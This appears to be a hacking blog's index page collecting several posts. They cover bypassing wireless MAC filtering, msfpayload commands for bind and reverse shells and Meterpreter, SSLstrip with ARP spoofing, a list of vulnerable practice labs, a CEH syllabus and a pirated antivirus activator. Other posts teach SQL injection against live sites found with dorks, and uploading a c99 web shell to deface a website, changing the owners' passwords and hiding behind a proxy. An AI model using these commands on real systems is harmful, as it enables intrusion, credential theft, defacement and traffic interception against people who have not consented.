Bypass Hidden SSID & MAC Address Filtering

The purpose of this blog post is to demonstrate why hidden SSID & MAC Address filtering should only be layers of wireless security used in conjunction with strong encryption such as WPA.

Below are the steps an attacker could take to bypass a hidden SSID and MAC Address filtering to gain a foothold on your network and either instigate further attacks or use your internet connection.

Tools

• Kismet

The Attack

1. I first use kismet to look at the wireless networks within range.



My target wireless network is "batman". I can see from kismet that this has no encryption and the SSID is hidden.

At this stage I wouldn't know that the AP was using MAC Address filtering so I could try to join the network using:

iwconfig eth1 essid batman

Then I would try to obtain an IP address using:

dhclient eth1

The request for an IP Address would fail as the WAP is filtering MAC addresses.


2. Within Kismet I look at the clients connected to "batman" to obtain a valid client MAC address.



I see an active client is using the MAC of 00:16:6F:4D:AE:8C

I could then either wait for the client to disconnect or use a tool such as aireplay-ng to force a disconnection. As this is a test lab I will simply disconnect the valid client.


3. I check my current wireless card config using ifconfig



Note: I see that Kismet has not brought the card out of promiscuous mode. This will need to be done manually.


4. I now want take my card out of promiscuous mode, change my MAC address to that of the valid client, and join the hidden (batman) network. To do this I use the following commands:

ifconfig eth1 -promisc
ifconfig eth1 down
ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
ifconfig eth1 up
iwconfig eth1 essid batman



I verify the output of these commands with ifconfig and iwconfig as i go along.


5. I now request an IP address from the DHCP server on the WAP using:

dhclient eth1



I have successfully been assigned an IP address of 192.168.1.202 from the WAP (192.168.1.5 hmmm this is useful to know as I can try the web interface on that using either default passwords (Kismet will tell me the make of the WAP) or hydra........)

If the WAP was not using DHCP I would at this stage configure my card manually and set up my own DNS.


7. I now test connectivity to the web using ping:

ping www.yahoo.com



my ping works, this tells me I have web access and DNS is working correctly.

Read More

Metasploit Payloads Tutorial

Metasploit Payloads - msfpayload

This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.

These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.

1. For a listening shell on the target

Create payload:

./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:

run Listen-shell.exe

Hacker:

nc 192.168.1.110 2482

2. For a reverse shell on the target

Create payload:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:

run reverse-shell.exe

3. For a VNC listener on target

Create payload:

./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:

run Listen-vnc.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E 

4. For a reverse VNC session

Create payload:

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:

run reverse-vnc.exe

5. For a meterpreter listener

create payload:

./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:

run met-listen.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E

6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:

run met-reverse.exe

UPDATE: Payload for 6 should read:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe

Read More

OPH crack Live CD

Ophcrack  is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Features:

• Runs on Windows, Linux/Unix, Mac OS X, ...
• Cracks LM and NTLM h ashes.
• Free tables available for Windows XP and Vista.
• Brute-force module for simple passwords.
• Audit mode and CSV export.
• Real-time graphs to analyze the passwords.
• LiveCD available to simplify the cracking.
• Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
• Free and open source software (GPL).

                                                            

Read More

SSL Strip using Backtrack

SSL Strip is a tool that hijacks HTTP traffic on a network by replacing all the HTTPS/SSL links with HTTP ones. Once SSL Strip is setup all the victim traffic will be routed through the attacker and HTTP traffic will be redirected to the attacker machine. The attacker will be able to obtain all logon information by sniffing the HTTP plaintext protocol.

How to:

1. Set up IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

2. Set up Port redirection using iptables
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1337

3. Start ARP MITM
arpspoof -i eth0 -t VICTIMIP GATEWAY

4. Start SSL Strip Tool
sslstrip -l 1337 -w log.txt

5. Wait until the target login to a website that supposed to use HTTPS/SSL

6. Check log.txt for captured information

Read More

Pentest lab

Pentest lab vulnerable servers-applications list

In this post I’m going to present some useful resources to learn about penetration testing and where to use exploitation tools and techniques in a safe and legal environment. This list contain a set of  deliberately insecure LiveCDs, Virtual machines and applicarions designed to be used as targets for enumeration, web exploitation, password cracking and reverse  engineering.

If you have other links/distribution/virtual machines, please leave a comment.

List updated on 13/9/2011

UltimateLAMP

UltimateLAMP is a Ubuntu VM  running vulnerable services and containing weak accounts.

The UltimateLAMP VM runs the following services:Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)

UltimateLAMP download

webgoat

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

http://www.owasp.org

Holynix
Similar to the de-ice Cd’s and pWnOS, holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example.
http://pynstrom.net/index.php?page=holynix.php

WackoPicko

WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found: http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf

https://github.com/adamdoupe/WackoPicko

De-ICE PenTest LiveCDs
The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Metasploitable

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Owaspbwa
Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications.
http://code.google.com/p/owaspbwa/

Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
http://www.mavensecurity.com/web_security_dojo/

Lampsecurity
LAMPSecurity training is designed to be a series of vunlerable virtual machine images along with complementary documentation designed to teach linux,apache,php,mysql security.
http://sourceforge.net/projects/lampsecurity/files/

Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
www.dvwa.co.uk

Hacking-Lab
This is the Hacking-Lab LiveCD project. It is currently in beta stadium. The live-cd is a standardized client environment for solving our Hacking-Lab wargame challenges from remote.
http://www.hacking-lab.com/hl_livecd/

Moth 
Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
http://www.bonsai-sec.com/en/research/moth.php

Exploit kb vulnerable web app
exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques This is a fully functional web site with a content management system based on fckeditor. You can download it as source code or a pre configured.
http://sourceforge.net/projects/exploitcoilvuln/

Gruyere

This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you’ll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you’ll learn the following:
How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution. To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

http://google-gruyere.appspot.com/

Damn Vulnerable Linux (DVL)
Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
http://www.damnvulnerablelinux.org

pWnOS
pWnOS is on a “VM Image”, that creates a target on which to practice penetration testing; with the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points

http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html

http://www.krash.in/bond00/pWnOS%20v1.0.zip

Virtual Hacking Lab
A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats.
http://sourceforge.net/projects/virtualhacking/files/

Badstore
Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure.
http://www.badstore.net/

BodgeIt Store

The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.

http://code.google.com/p/bodgeit/

Hackademic Challenges

The OWASP Hackademic Challenges , is an open source project that can be used to test and improve one’s knowledge of information system and web application security. The OWASP Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe, controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker’s perspective.

www.hackademic.eu

OWASP Vicnum Project

A flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’ . Play the game at http://vicnum.ciphertechs.com

https://sourceforge.net/projects/vicnum/

Stanford SecuriBench

Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.

http://suif.stanford.edu/~livshits/securibench/

Kioptrix

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).
The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

http://www.kioptrix.com/blog/?page_id=135

hackxor

Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc

http://hackxor.sourceforge.net

Project GameOver:

Project GameOver was started with the objective of training and educating newbies about the basics of web security and educate them about the common web attacks and help them understand how they work. It is collection of various vulnerable web applications, designed for the purpose of learning web penetration testing. We have included some of the above mentioned deliberately vulnerable websites.

http://null.co.in/2012/06/14/gameover-web-pentest-learning-platform/

Read More

Comptia N+ Ebook

LESSON 1: Basic Network Theory
Network Definitions
Network Models
Connectivity
Network Addressing
Signaling Concepts

LESSON 2: Network Connectivity
The Data Package
Establishing a Connection
Reliable Delivery
Network Connectivity
Noise Control
Building Codes
Connection Devices

LESSON 3: Advanced Network Theory
The OSI Model
Ethernet
Network Resources
Token Ring/IEEE 802.5
FDDI
Wireless Networking

LESSON 4: Common Network Protocols
Families of Protocols
NetBEUI
Bridges and Switches
The TCP/IP Protocol
Building a TCP/IP Network
The TCP/IP Suite

LESSON 5: TCP/IP Services
Dynamic Host Configuration Protocol
DNS Name Resolution
NetBIOS Support
SNMP
TCP/IP Utilities
Upper Layer Services: FTP

LESSON 6: Alternate Network Protocols
Introduction to IPX/SPX
AppleTalk
Introduction to Apple Open Transport
Introduction to IPv6

LESSON 7: Network LAN Infrastructure
Implement LAN Protocols on a Network
IP Routing
IP Routing Tables
Router Discovery Protocols
Data Movement in a Routed Network
Virtual LANs (VLANs)

LESSON 8: Network WAN Infrastructure
The WAN Environment
WAN Transmission Technologies
WAN Connectivity Devices
Voice Over Data Services

LESSON 9: Remote Networking
Remote Networking
Remote Access Protocols
VPN Technologies

LESSON 10: Network Security
Introduction to Network Security
Virus Protection
Local Security
Network Access
Internet Security

LESSON 11: Disaster Recovery
The Need for Disaster Recovery
Disaster Recovery Plan
Data Backups
Fault Tolerance

LESSON 12: Advanced Data Storage Techniques
Enterprise Data Storage
Clustering
Network Attached Storage
Storage Area Networks

LESSON 13: Network Troubleshooting
Using a Systematic Approach to Troubleshooting
Network Support Tools: Utilities
The Network Baseline

LESSON 14: Network Operating Systems
Novell NetWare
Microsoft BackOffice
Linux History and Operation
Macintosh

LESSON 15: Appendix
Appendix

DOWNLOAD EBOOK

Read More

Kaspersky full version activator

Kaspersky activator

DOWNLOAD HERE

Read More

Havij Tutorial-Website Hacking

Havij Tutorial-Website Hacking

  it is simple tut how to use havij to hack sites

                                                           

                                                          Click Here To Download Havij

1.First Find a sqli infected site

GOTO

This Link

2-Open havij and copy and paste infected link as shown in figure

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name l
ike xxxx_xxxx

4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

 

5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

6. In that Just put mark username and password and click "Get data"

7. Bingo Got now id and pass that may be admin...

The pass will get as md5 you can crack it also using this tool as shown in figure..

For SQL Dorks List Click Here And Download it Now

Read More

Hack Website

Upload Shell and Deface a Website

What we need:

1-A Shell (Will be provided)

2-A website vulnerable to SQLi

3-Image or File upload area on that Vulnerable website

So firstly download the shell here.

Download


What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )


So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

Now login to the admin page with the admin details you got.

Go through the admin page until you find a place where you can upload a picture (Usually a picture).

Now you have to upload the shell. Right if you don’t get an error it is all good.

Now to find the shell

Go through the site until you find any image and if you are using firefox Right

- Click on it and “Copy Image Location”

Make a new tab and paste it there.

It will probably look something like this:

http://www.example.com/images/photonamehere.jpg

So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)

Now a page will come up looking like this:

igz03k How To Upload Shell and Deface Tutorial

Does probably not look like that but will look similar.

Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

Keep in mind:

• Change Admin Username and Password

•The people have FTP access so you need to change that Password too .

•Always use a Proxy or VPN

Read More

Online hacking Tools

Online Tools

Footprinting 

Nmap Online

IP Locator

Traceroute

WayBack Machine

Whois Lookup

Ascii Table

Hash Cracking

MD5

NTLM

SHA1

Converters

Binary Translator

Read More

Ethical Hacking Syllabus overview

Certified Ethical Hacker

Certified Ethical Hacker (312-50) CEH

1.	CEH Ethics and Legal Issues	12.	CEH Web Application Vulnerabilities
2.	CEH Footprinting	13.	CEH Web Based Password Cracking Techniques
3.	CEH Scanning	14.	CEH SQL Injection
4.	CEH Enumeration	15.	CEH Hacking Wireless Networks
5.	CEH System Hacking	16.	CEH Virus and Worms
6.	CEH Trojans and Backdoors	17.	CEH Hacking Novell
7.	CEH Sniffers	18.	CEH Hacking Linux
8.	CEH Denial of Service	19.	CEH IDS, Firewalls and Honeypots
9.	CEH Social Engineering	20.	CEH Buffer Overflows
10.	CEH Session Hijacking	21.	CEH Cryptography
11.	CEH Hacking Web Servers	22.	CEH Penetration Testing Methodologies

Certified Ethical Hacker (CEH) Module 1: Ethics and Legality

What is an Exploit? The security functionality triangle The attacker's process Passive reconnaissance Active reconnaissance Types of attacks Categories of exploits Goals attackers try to achieve Ethical hackers and crackers - who are they Self proclaimed ethical hacking Hacking for a cause (Hacktivism) Skills required for ethical hacking

Categories of Ethical Hackers What do Ethical Hackers do? Security evaluation plan Types of Ethical Hacks Testing Types Ethical Hacking Report Cyber Security Enhancement Act of 2002 Computer Crimes Overview of US Federal Laws Section 1029 Section 1030 Hacking Punishment

Certified Ethical Hacker (CEH) Module 2: Footprinting

What is Footprinting Steps for gathering information Whois http://tucows.com Hacking Tool: Sam Spade Analyzing Whois output NSLookup Finding the address range of the network

ARIN Traceroute Hacking Tool: NeoTrace Visual Route Visual Lookout Hacking Tool: Smart Whois Hacking Tool: eMailTracking Pro Hacking Tool: MailTracking.com

Certified Ethical Hacker (CEH) Module 3: Scanning

Determining if the system is alive? Active stack fingerprinting Passive stack fingerprinting Hacking Tool: Pinger Hacking Tool: Friendly Pinger Hacking Tool: WS_Ping_Pro Hacking Tool: Netscan Tools Pro 2000 Hacking Tool: Hping2 Hacking Tool: KingPing Hacking Tool: icmpenum Hacking Tool: SNMP Scanner Detecting Ping sweeps ICMP Queries Hacking Tool: netcraft.com Port Scanning TCPs 3-way handshake TCP Scan types Hacking Tool: IPEye Hacking Tool: IPSECSCAN

Hacking Tool: nmap Port Scan countermeasures Hacking Tool: HTTrack Web Copier Network Management Tools SolarWinds Toolset NeoWatch War Dialing Hacking Tool: THC-Scan Hacking Tool: PhoneSweep War Dialer Hacking Tool: Telesweep Hacking Tool: Queso Hacking Tool: Cheops Proxy Servers Hacking Tool: SocksChain Surf the web anonymously TCP/IP through HTTP Tunneling Hacking Tool: HTTPort Hacking Tool: Tunneld Hacking Tool: BackStealth

Certified Ethical Hacker (CEH) Module 4: Enumeration

Determining if the system is alive? What is Enumeration NetBios Null Sessions Null Session Countermeasures NetBIOS Enumeration Hacking Tool: DumpSec Hacking Tool: Hyena Hacking Tool: NAT SNMP Enumertion SNMPUtil Hacking Tool: IP Network Browser SNMP Enumeration Countermeasures

Windows 2000 DNS Zone transfer Identifying Win2000 Accounts Hacking Tool: User2SID Hacking Tool: SID2User Hacking Tool: Enum Hacking Tool: UserInfo Hacking Tool: GetAcct Hacking Tool: smbbf SMB Auditing Tools Active Directory Enumeration W2K Active Directory attack

Certified Ethical Hacker (CEH) Module 5: System Hacking

Administrator Password Guessing Performing Automated Password Guessing Legion NTInfoScan Defending Against Password Guessing Monitoring Event Viewer Logs VisualLast Eavesdroppin on Network Password Exchange Hacking Tool: L0phtCrack Hacking Tool: KerbCrack Privilege Escalation Hacking Tool: GetAdmin Hacking Tool: hk Manual Password Cracking Algorithm Automatic Password Cracking Algorithm Password Types Types of Password Attacks Dictionary Attack Brute Force Attack Distributed Brute Force Attack Password Change Interval Hybrid Attack Cracking Windows 2000 Passwords Retrieving the SAM file Redirecting SMB Logon to the Attacker SMB Redirection Hacking Tool: SMBRelay Hacking Tool: SMBRelay2 Hacking Tool: pwdump2 Hacking Tool: SAMdump Hacking Tool: C2MYAZZ Win32 Create Local Admin User Offline NT Password Resetter Hacking Tool: psexec Hacking Tool: remoxec SMBRelay Man-in-the-Middle (MITM) SMBRelay MITM Countermeasures Hacking Tool: SMBGrinder Hacking Tool: SMBDie Hacking Tool: NBTDeputy NetBIOS DoS Attack Hacking Tool: nbname Hacking Tool: John the Ripper LanManager Hash

Certified Ethical Hacker (CEH) Module 6: Trojans and Backdoors

What is a Trojan Horse? Overt and Covert Hacking Tool: QAZ Hacking Tool: Tini Hacking Tool: Netcat Hacking Tool: Donald Dick Hacking Tool: SubSeven Hacking Tool: BackOrifice 2000 Back Oriffice Plug-ins BoSniffer Hacking Tool: NetBus ComputerSpy Key Logger Hacking Tool: Beast Trojan Hacking Tool: CyberSpy Telnet Trojan Hacking Tool: SubRoot Telnet Trojan Hacking Tool: LetMeRule Wrappers Hacking Tool: Graffiti Hacking Tool: Silk Rope 2000 Hacking Tool: EliteWrap Hacking Tool: IconPlus Packaging Tool: Microsoft WordPad

Hacking Tool: Whack a Mole Trojan Construction Kit Writing Trojans in Java Hacking Tool: FireKiller 2000 Covert Channels ICMP Tunneling Hacking Tool: Loki Reverse WWW Shell Backdoor Countermeasures BO Startup and Registry Entries NetBus Startup and Registry Keys Port Monitoring Tools fPort TCPView Process Viewer Inzider - Tracks Processes and Ports Trojan Maker Hacking Tool: Hard Disk Killer Man-in-the-Middle Attack Hacking Tool: dsniff System File Verification TripWire

Certified Ethical Hacker (CEH) Module 7: Sniffers

What is a Sniffer? Hacking Tool: Ethereal Hacking Tool: Snort Hacking Tool: WinDump Hacking Tool: EtherPeek Passive Sniffing Active Sniffing Hacking Tool: EtherFlood How ARP Works? Hacking Tool: ArpSpoof Hacking Tool: DSniff Hacking Tool: Macof Hacking Tool: mailsnarf Hacking Tool: URLsnarf Hacking Tool: Webspy Hacking Tool: Ettercap

Hacking Tool: WebMiTM IP Restrictions Scanner Hacking Tool: sTerm Hacking Tool: Cain and Abel Hacking Tool: Packet Crafter Hacking Tool: SMAC MAC Changer ARP Spoofing Countermeasures Hacking Tool: WinDNSSpoof Hacking Tool: Distributed DNS Flooder Hacking Tool: WinSniffer Network Tool: IRIS Network Tool: NetInterceptor SniffDet Hacking Tool: WinTCPKill

Certified Ethical Hacker (CEH) Module 8: Denial of Service

What is Denial of Service Attack? Types of DoS Attacks How DoS Work? What is DDoS? Hacking Tool: Ping of Death Hacking Tool: SSPing Hacking Tool: Land Hacking Tool: Smurf Hacking Tool: SYN Flood Hacking Tool: CPU Hog Hacking Tool: Win Nuke Hacking Tool: RPC Locator Hacking Tool: Jolt2 Hacking Tool: Bubonic Hacking Tool: Targa Tools for Running DDoS Attacks

Hacking Tool: Trinoo Hacking Tool: WinTrinoo Hacking Tool: TFN Hacking Tool: TFN2K Hacking Tool: Stacheldraht Hacking Tool: Shaft Hacking Tool: mstream DDoS Attack Sequence Preventing DoS Attack DoS Scanning Tools Find_ddos SARA DDoSPing RID Zombie Zapper

Certified Ethical Hacker (CEH) Module 9: Social Engineering

What is Social Engineering? Art of Manipulation Human Weakness Common Types of Social Engineering Human Based Impersonation Important User Tech Support Third Party Authorization In Person Dumpster Diving

Shoulder Surfing Computer Impersonation Mail Attachments Popup Windows Website Faking Reverse Social Engineering Policies and Procedures Social Engineering Security Policies The Importance of Employee Education

Certified Ethical Hacker (CEH) Module 10: Session Hijacking

What is Session Hijacking? Session Hijacking Steps Spoofing Vs Hijacking Active Session Hijacking Passive Session Hijacking TCP Concepts - 3 way Handshake Sequence Numbers Sequence Number Example Guessing the Sequence Numbers

Hacking Tool: Juggernaut Hacking Tool: Hunt Hacking Tool: TTYWatcher Hacking Tool: IP Watcher Hacking Tool: T-Sight Remote TCP Session Reset Utility Dangers Posed by Session Hijacking Protection against Session Hijacking

Certified Ethical Hacker (CEH) Module 11: Hacking Web Servers

Apache Vulnerability Attacks against IIS IIS Components ISAPI DLL Buffer Overflows IPP Printer Overflow msw3prt.dll Oversized Print Requests Hacking Tool: Jill32 Hacking Tool: IIS5-Koei Hacking Tool: IIS5Hack IPP Buffer Overflow Countermeasures ISAPI DLL Source Disclosure ISAPI.DLL Exploit Defacing Web Pages IIS Directory Traversal Unicode Directory Listing Clearing IIS Logs Network Tool: LogAnalyzer Attack Signature Creating Internet Explorer (IE) Trojan Hacking Tool: IISExploit

Hacking Tool: UnicodeUploader.pl Hacking Tool: cmdasp.asp Escalating Privilages on IIS Hacking Tool: IISCrack.dll Hacking Tool: ispc.exe IIS WebDav Vulnerability Hacking Tool: WB RPC Exploit-GUI Hacking Tool: DComExpl_UnixWin32 Hacking Tool: Plonk Unspecified Executable Path Vulnerability Hacking Tool: CleanIISLog File System Traversal Countermeasures Microsoft HotFix Problems UpdateExpert Cacls utility Network Tool: Whisker N-Stealth Scanner Hacking Tool: WebInspect Network Tool: Shadow Security Scanner

Certified Ethical Hacker (CEH) Module 12: Web Application Vulnerabilities

Documenting the Application Structure Manually Inspecting Applications Using Google to Inspect Applications Directory Structure Hacking Tool: Instant Source Java Classes and Applets Hacking Tool: Jad HTML Comments and Contents Hacking Tool: Lynx

Hacking Tool: Wget Hacking Tool: Black Widow Hacking Tool: WebSleuth Cross Side Scripting Session Hijacking using XSS Cookie Stealing Hacking Tool: IEEN Hacking Tool: IEflaw Exposing Sensitive Data with Google

Certified Ethical Hacker (CEH) Module 13: Web Based Password Cracking Techniques

Basic Authentication Message Digest Authentication NTLM Authentication Certificate based Authentication Digital Certificates Microsoft Passport Authentication Forms based Authentication Creating Fake Certificates Hacking Tool: WinSSLMiM Password Guessing Dfault Account Database Hacking Tool: WebCracker Hacking Tool: Brutus

Hacking Tool: ObiWan Hacking Tool: Munga Bunga Password dictionary Files Attack Time Hacking Tool: Variant Hacking Tool: PassList Query Strings Post data Hacking Tool: cURL Stealing Cookies Hacking Tool: CookieSpy Hacking Tool: ReadCookies Hacking Tool: SnadBoy

Certified Ethical Hacker (CEH) Module 14: SQL Injection

What is SQL Injection Vulnerability? SQL Insertion Discovery Blank sa Password Simple Input Validation SQL Injection OLE DB Errors 1=1 blah' or 1=1

Preventing SQL Injection Database Specific SQL Injection Hacking Tool: SQLDict Hacking Tool: SQLExec Hacking Tool: SQLbf Hacking Tool: SQLSmack Hacking Tool: SQL2.exe Hacking Tool: Oracle Password Buster

Certified Ethical Hacker (CEH) Module 15: Hacking Wireless Networks

802.11 Standards What is WEP? Finding WLANs Cracking WEP keys Sniffing Trafic Wireless DoS Attacks WLAN Scanners WLAN Sniffers MAC Sniffing

Access Point Spoofing Securing Wireless Networks Hacking Tool: NetTumbler Hacking Tool: AirSnort Hacking Tool: AiroPeek Hacking Tool: WEP Cracker Hacking Tool: Kismet Hacking Tool: AirSnarf WIDZ- Wireless IDS

Certified Ethical Hacker (CEH) Module 16: Virus and Worms

Cherobyl ExploreZip I Love You Melissa Pretty Park Code Red Worm W32/Klez BugBear

W32/Opaserv Worm Nimda Code Red SQL Slammer Batch File Virus Creator How to write your own Virus? Worm Construction Kits

Certified Ethical Hacker (CEH) Module 17: Novell Hacking

Common accounts and passwords Accessing password files Password crackers Netware Hacking Tools Chknull NOVELBFH NWPCRACK Bindery BinCrack

SETPWD.NLM Kock userdump Burglar Getit Spooflog Gobbler Novelffs Pandora

Certified Ethical Hacker (CEH) Module 18: Linux Hacking

Why Linux ? Linux Basics Compiling Programs in Linux Scanning Networks Mapping Networks Password Cracking in Linux Linux Vulnerabilities SARA

TARA Sniffing A Pinger in Disguise Session Hijacking Linux Rootkits Linux Security Countermeasures IPChains and IPTables

Certified Ethical Hacker (CEH) Module 19: IDS, Firewalls and Honeypots

Intrusion Detection System System Integrity Verifiers How are Intrusions Detected? Anomaly Detection Signature Recognition How does IDS match Signatures with Incoming Traffic? Protocol Stack Verification Application Protocol Verification What Happens after an IDS Detects an Attack? IDS Software Vendors SNORT Evading IDS (Techniques) Complex IDS Evasion Hacking Tool: fragrouter

Hacking Tool: TCPReplay Hacking Tool: SideStep Hacking Tool: NIDSbench Hacking Tool: ADMutate IDS Detection Tools to Detect Packet Sniffers Tools to inject strangely formatted packets onto the wire Hacking Through Firewalls Placing Backdoors through Firewalls Hiding behind Covert Channels Hacking Tool: Ncovert What is a Honeypot? Honeypots Evasion Honeypots vendors Hacking Tool: Honeyd

Certified Ethical Hacker (CEH) Module 20: Buffer Overflows

What is a Buffer Overflow? Exploitation Assembly Language Basics How to Detect Buffer Overflows in a Program? Skills Required CPU/OS Dependency Understanding Stacks Stack Based Buffer Overflows

Buffer Overflow Technical Implementation Writing your own Buffer Overflow Exploit in C Defense against Buffer Overflows Type Checking Tools for Compiling Programs StackGuard Immunix

Certified Ethical Hacker (CEH) Module 21: Cryptography

What is PKI? Digital Certificates RSA MD-5 RC-5

SHA SSL PGP SSH Encryption Cracking Techniques

Certified Ethical Hacker (CEH) Module 22: Penetration Testing Methodologies

Physical Security Testing Port Scanning Testing System Identification Testing Services Identification Testing Vulnerability Research and Verification Testing Application Testing and Source Code Review Router Testing Firewall Testing Intrusion Detection System Testing Domain Trusted Systems Testing

Application Password Cracking Testing Denial of Service Testing Containment Measures Testing Information Security Document Grinding Gathering Competitive Intelligence Social Engineering Testing Wireless Networks Testing Cordless Communications Testing Infrared Systems Testing Modem Testing Writing Penetration Testing Reports

Read More